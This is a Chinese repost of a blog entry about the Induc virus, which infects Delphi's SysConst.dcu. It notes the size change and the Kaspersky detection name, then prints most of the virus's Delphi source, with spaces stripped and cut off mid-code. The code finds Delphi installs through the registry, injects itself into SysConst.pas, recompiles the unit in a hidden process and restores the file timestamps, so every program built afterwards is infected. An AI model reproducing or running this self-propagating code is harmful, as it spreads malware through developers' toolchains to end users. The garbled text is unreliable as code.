感染delphi编译器的SysConst.dcu病毒病毒防范 感染delphi编译器的SysConst.dcu病毒病毒防范（共4篇），以下是小编为大家准备的感染delphi编译器的SysConst.dcu病毒病毒防范，希望对大家有帮助。篇1：感染delphi编译器的SysConst.dcu病毒病毒防范作者:Azrael日期:-08-19好有趣的感染方式,够可爱了~今天群的人发了一条链接,关于许多人SysConst.dcu被感染.被感染后的SysConst.dcu体积是18KB左右,正常的SysConst.dcu是12KB左右.偷偷瞄了一下偶的SysConst.dcu,竟然被感染了,而且潜伏的时间应该超过4个月~只是前两天卡巴更新病毒库,卡巴报病毒名为:Virus.Win32.Induc.a,大家才发觉有所不妥.useswindows;varsc:array[1..24]ofstring=(','functionx(s:string):string;vari:integer;beginfori:=1tolength(s)doifs','=#36thens:=#39;result:=s;end;procedurere(s,d,e:string);varf1,f2:textfile;','h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin','h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);ifhDWORD(-1)thenbeginCloseHandle','(h);exit;end;{$I-}assignfile(f1,s);reset(f1);ifioresult0thenexit;assignfile','(f2,d+$pas$);rewrite(f2);ifioresult0thenbeginclosefile(f1);exit;end;while','noteof(f1)dobeginreadln(f1,s);writeln(f2,s);ifpos($implementation$,s)0','thenbreak;end;forh:=1to1dowriteln(f2,sc[h]);forh:=1to23dowriteln(f2',',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);forh:=2to24dowriteln(f2,','x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$','));fillchar(f,sizeof(f),0);f.cb:=sizeof(f);f.dwFlags:=STARTF_USESHOWWINDOW;f.','wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$“$+d+$pas”$),0,0,false,0,0,0,','f,p);ifbthenWaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),','pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,','0,0);ifh=DWORD(-1)thenexit;GetFileTime(h,@t1,@t2,@t3);CloseHandle(h);h:=','CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);ifh=DWORD(-1)thenexit;SetFileTime(h,','@t1,@t2,@t3);CloseHandle(h);end;procedurest;vark:HKEY;c:array[1..255]of','char;i:cardinal;r:string;v:char;beginforv:=$4$to$7$doifRegOpenKeyEx(','HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0then','begini:=255;ifRegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0thenbeginr:=$$;i:=','1;whilec#0dobeginr:=r+c;inc(i);end;re(r+$\sour